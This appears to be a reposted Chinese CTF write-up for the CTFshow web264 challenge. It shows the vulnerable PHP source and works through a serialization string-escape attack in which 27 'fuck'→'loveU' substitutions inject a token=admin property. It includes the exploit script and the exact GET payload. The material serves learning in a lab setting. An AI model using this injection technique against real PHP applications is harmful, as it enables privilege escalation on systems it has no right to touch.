目录

• 源码
• 思路
• 题解
• 总结

---

源码

index.php

<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 02:37:19 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 16:05:38 | # @message.php |这里给了提示 # @email: h1xa@ctfer.com | # @link: https://ctfer.com*/error_reporting(0); session_start();class message{public $from;public $msg;public $to;public $token='user';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;} }$f = $_GET['f']; $m = $_GET['m']; $t = $_GET['t'];if(isset($f) && isset($m) && isset($t)){$msg = new message($f,$m,$t);$umsg = str_replace('fuck', 'loveU', serialize($msg));$_SESSION['msg']=base64_encode($umsg);echo 'Your message has been sent'; }highlight_file(__FILE__);

message.php

<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-03 15:13:03 # @Last Modified by: h1xa # @Last Modified time: 2020-12-03 15:17:17 # @email: h1xa@ctfer.com # @link: https://ctfer.com*/ session_start(); highlight_file(__FILE__); include('flag.php');class message{public $from;public $msg;public $to;public $token='user';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;} }if(isset($_COOKIE['msg'])){$msg = unserialize(base64_decode($_SESSION['msg']));if($msg->token=='admin'){echo $flag;} }

---

思路

典型的字符逃逸问题

fuck每转一次love就会逃逸出一个字符

先直接拿到序列化结果

<?php class message{public $from;public $msg;public $to='a';public $token='user'; } $msg = new message(); $umsg = serialize($msg); echo $umsg; //O:7:"message":4:{s:4:"from";N;s:3:"msg";N;s:2:"to";s:1:"a";s:5:"token";s:4:"user";}

user要改成admin,要逃逸出来的部分实际上是";s:5:"token";s:5:"admin";},一共27个字符要转换27次

题解

exp <?php class message{public $from;public $msg;public $to;public $token='user';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;} } $f; $m; $t = 'fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}'; $msg = new message($f,$m,$t); $umsg = str_replace('fuck', 'loveU', serialize($msg)); echo $umsg; //O:7:"message":4:{s:4:"from";N;s:3:"msg";N;s:2:"to";s:135:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";} index.php get:?f=&m=&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";} message.php Cookie 加上 msg= xxx

---

总结

水题

总结

以上是生活随笔为你收集整理的CTFshow 反序列化 web264的全部内容，希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错，欢迎将生活随笔推荐给好友。